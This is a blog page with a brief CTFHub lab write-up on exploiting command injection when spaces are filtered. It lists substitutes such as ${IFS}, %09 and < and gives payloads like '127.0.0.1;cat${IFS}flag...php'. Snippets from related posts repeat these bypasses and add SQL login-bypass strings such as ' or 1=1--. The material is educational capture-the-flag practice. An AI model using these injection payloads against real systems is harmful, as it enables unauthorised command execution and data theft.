CTFHUB-技能树-Web题-RCE（远程代码执行）-远程包含-命令注入-过滤空格

最新推荐文章于 2025-07-29 17:35:11 发布

原创最新推荐文章于 2025-07-29 17:35:11 发布 · 229 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#web安全 #php

CTFHUB解题思路专栏收录该内容

28 篇文章

订阅专栏

CTFHUB-技能树-Web题-RCE（远程代码执行）-远程包含-命令注入-过滤空格

就是过滤掉了空格找能代替空格的代替就行了
使用IFS$9、%09、<、>、<>、{,}、%20、${IFS}、${IFS}来代替空格

127.0.0.1;cat${IFS}xxxx.php

先来查看一下目录

127.0.0.1|ls

在这里插入图片描述
查看第一个页面里的内容

127.0.0.1;cat${IFS}flag_12248740727993.php

在这里插入图片描述

查看源代码

在这里插入图片描述

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

python炒粉

关注关注

3
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

CTFHUB-技能树-WEB通关

Alita_lxz的博客

11-11

7884

Web 题目来自ctfhub技能树web部分 Web前置技能操作系统数据库 HTTP协议请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法（也叫动作）来以不同方式操作指定的资源。 1.OPTIONS 　　返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功，则它会在HTTP头中包含一个名为“Allow”的头，值是所支持的方法，如“GET,POST”。　2.HEAD 　　向服务

CTFHub技能树 Web-RCE 详解

weixin_45808483的博客

11-13

2578

RCE简介：初学RCE（远程命令/代码执行漏洞）https://blog.youkuaiyun.com/qq_43814486/article/details/90020139 eval执行启动环境分析代码，提示我们将命令赋值给cmd执行我们先查看当前位置的文件，没有什么用 /?cmd=system("ls"); 我们查看根目录文件，发现一个 flag_8999 文件 /?cmd=system("ls /"); 我们先尝试使用cat 命令查看 flag_8999文件 /..

参与评论您还未登录，请先登录后发表或查看评论

CTFHub技能树笔记之RCE：命令注入、过滤cat、过滤空格

热门推荐

weixin_48799157的博客

03-28

1万+

小白一个，记录解题过程，如有错误请指正！一、命令注入补充知识点：命令行注入漏洞是指web应用程序中调用了系统可执行命令的函数，而且输入参数是可控的，如果黑客拼接了注入命令，就可以进行非法操作了。 Windows系统支持的管道符如下： 1. “|”：直接执行后面的语句。 2. “||”：如果前面的语句执行失败，则执行后面的语句，前面的语句只能为假才行。 3. “&”：两条命令都执行，如果前面的语句为假则直接执行后面的语句，前面的语句可真可假。 4. “&&...

CTFHub技能树web（持续更新）--RCE--命令注入--过滤空格

jiuyongpinyin的博客

01-26

745

过滤空格这次过滤了空格，使用ls查看当前目录： 127.0.0.1&ls 发现了一个php文件，因为空格被过滤了，我们可以使用 < 或 <> 重定向符来代替空格： 127.0.0.1&cat<flag_3199012005565.php 然后查看网页源代码，得到flag：注：萌新第一次写write up，不足之处还请见谅，不对之处欢迎批评指正 ...

【CTFhub】命令注入—过滤空格

manerzi的博客

10-25

882

【CTFhub】命令注入—过滤空格

CTFHub | 过滤空格

尼泊罗河伯的博客

06-20

1250

检查网页源代码发现这题如果有空格就不会执行，说明这题对空格做了过滤处理。同样在输入框中输入 IP 进行测试，可以正常回显。

过滤空格（ctfhub）

2401_82985722的博客

04-02

738

注释过滤 /**/、/*!*/、//、#、--括号过滤 ()符号过滤 %00、%09、%20、%a0 %0a、%0b、%0c、%0d引号过滤 ' 、 "大小写过滤大小写双关键字绕过 '+'正则表达式绕过 \s、\s*\s+ 表示匹配一个或多个空白字符，\s* 表示匹配零个或多个空白字符。

CTF之命令执行常见绕过

qq_42383069的博客

04-18

7539

在 linux 下表示分隔符，只有cat$IFSa.txt 的时候, bash 解释器会把整个 IFSa当做变量名，所以导致没有办法运行，然而如果加一个 {} 就固定了变量名，同理在后面加个 $ 可以起到截断的作用，而 $9 指的是当前系统shell 进程的第九个参数的持有者，就是一个空字符串，因此 $9 相当于没有加东西，等于做了一个前后隔离。]有一个重要的区别，当匹配的文件不存在，[…通过测试，可见程序过滤了截断符，根据以上的知识，我们来fuzz一下可用的截断符。根据burp爆破，发现可以通过。

CTFHUB-web-RCE

ookami6497的博客

12-03

1718

无

ctfhub技能树web：RCE里的eval执行和命令注入

2302_81010533的博客

03-30

660

远程命令/代码执行漏洞，简称为RCE漏洞，可以直接向服务器后台远程注入操作系统的命令或者代码，从而拿到服务器后台的权限。首先执行ping命令，ping本机ip:127.0.0.1,再加上ls这个系统命令，连起来就是127.0.0.1;ls接着查看里面的文件，构造命令127.0.0.1;检查网页显示内容可以发现题目中直接给出了一段源代码，代码的大致意思是判断用户是否传了一个 cmd 参数，否则执行 else。检查目录列表发现关于flag的文件，检查内容发现flag。，查看可以访问的文件，发现一个。

CTFHub技能树web之RCE（二）

wzhwzh123321的博客

02-20

1320

打开phpinfo，可以看到allow_url_fopen和allow_url_include都是On，因此可以使用php://input，由于代码会检查file中的内容，因此不能够使用php://filter包含文件，使用php://input通过hackbar使用POST方式发包，抓包并在最后一行加php代码执行。使用%0a拼接cd%09*_is_here进入flag文件所在的目录中，由于cat被过滤因此使用tac，再使用%0a拼接tac%09*输出flag文件内容，构造语句为?

在CTF比赛中，命令中空格被过滤的解决方法

a3320315的博客

08-19

7630

1、linux {cat,flag.txt} cat${IFS}flag.txt cat$IFS$9flag.txt cat<flag.txt cat<>flag.txt kg=$'\x20flag.txt'&&cat$kg (\x20转换成字符串就是空格，这里通过变量的方式巧妙绕过) 2、windows下（实用性不是很广，也就type这个命令可以用） ty...

CTFHub技能书解题笔记-RCE-过滤空格、过滤目录分隔符、过滤运算符

qq_43006864的博客

04-01

5107

一、过滤空格过滤了空格。引入绕过空格过滤的字符：< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等直接开始解题这里就用<来绕过。flag还是再界面源码。二、过滤目录分隔符题目提示，这次过滤了目录分割符 / ，你能读到 flag 目录下的 flag 文件吗。这里的话就更简单了，我们可以使用;和cd到目录然后使用cat抓取。也就是用；进行命令拼接。例如：x.x.x.x;cd ../;ls;cat xxx

渗透测试与漏洞扫描有什么区别？

2508_91692437的博客

07-29

226

摘要：渗透测试与漏洞扫描在网络安全评估中各有侧重。漏洞扫描通过自动化工具（如Nessus）快速识别已知漏洞（如配置错误），适用于日常运维；渗透测试由专业人员模拟真实攻击，验证漏洞危害及系统防御能力，适合关键系统评估。前者成本低、覆盖广但深度有限，后者成本高、耗时长但能揭示复杂攻击链。两者在目标、方法、深度及适用场景上互补，共同提升安全防护水平。（149字）

【网络工程师软考版】网络安全

最新发布

BachelorSC ' s Notes

07-29

781

的应用1、能够确认发送方2、能够确定消息的。

弱口令：网络安全中最脆弱的锁，如何加固？

Gappsong874的博客

07-25

1176

想象一下：你家防盗门装的是玩具塑料锁，小偷用一根牙签就能捅开——这就是弱口令在数字世界的危险写照。2023年Verizon报告显示，，而修复成本高达每次泄露。

常见的万能密码

KP_0x01的博客

07-19

3339

' or 1=1--" or 1=1--' or 1=1#" or 1=1#' or 1=1/*" or 1=1/*--" or 1=1--' or 1=1#" or 1=1#' or 1=1/*" or 1=1/*

代码审计与web安全选择题1

m0_74726609的博客

07-25

1018

持续关注网安发展动向；• 软件安全的定义：根据国家标准GB/T 30998—2014《信息技术软件安全保障规范》，软件安全（Software Safety）是软件工程与软件保障的一个方面，它提供一种系统的方法来标识、分析和追踪对危害以及具有危害性的功能（例如数据和命令）的软件缓解措施与控制。软件的（）通常指的是计算机程序或硬件系统中存在的任何类型的错误、故障或缺陷，这些错误可能会导致意外的结果或异常的系统行为，更多的是影响软件的功能性，比如包括编程错误、硬件故障、逻辑错误等。

CTFHUB----web前置技能-rce

01-01

### CTFHUB Web 前置技能 RCE 挑战及解题思路 #### 远程命令执行简介远程命令执行（Remote Command Execution, RCE），是指攻击者能够通过应用程序接口发送特定指令，在服务器端执行任意操作系统级别的命令。这种漏洞一旦被利用，可能导致整个系统的完全控制。 #### 发现潜在的RCE漏洞当面对可能存在RCE漏洞的应用程序时，通常会寻找可以输入数据的地方，比如表单提交、URL参数等位置。如果这些地方的数据未经严格验证就直接用于构建并执行系统调用，则可能成为RCE攻击的目标[^1]。 #### 验证是否存在RCE漏洞为了确认是否真的存在这样的安全风险，可以通过尝试注入一些简单的测试语句来观察响应情况。例如，在支持PHP环境的情况下，可以试着向目标页面传递如下payload： ```php <?php phpinfo(); ?> ``` 如果上述代码被执行并且返回了PHP配置信息，则说明确实存在未受保护的入口点允许外部传入的内容影响到内部逻辑处理流程。 #### 利用已知条件构造有效载荷假设经过初步探测之后发现了某个变量可以直接参与到shell_exec()函数之中去，那么就可以精心设计一段能实现预期目的同时又不会引起怀疑的日志记录脚本作为最终的有效负载。这里给出一个简单例子用来获取当前目录下的文件列表： ```bash ls -al ``` 当然实际操作过程中还需要考虑更多因素，如编码方式转换、特殊字符转义等问题以确保成功绕过防护机制达到想要的效果。 #### 安全建议对于开发者而言，预防此类问题的发生至关重要。应当遵循最小权限原则分配资源访问权；对所有来自客户端的信息都应做充分校验过滤后再参与后续运算过程；定期审查源码查找安全隐患及时修复补丁版本更新至最新状态等等措施均有助于减少遭受恶意侵害的可能性。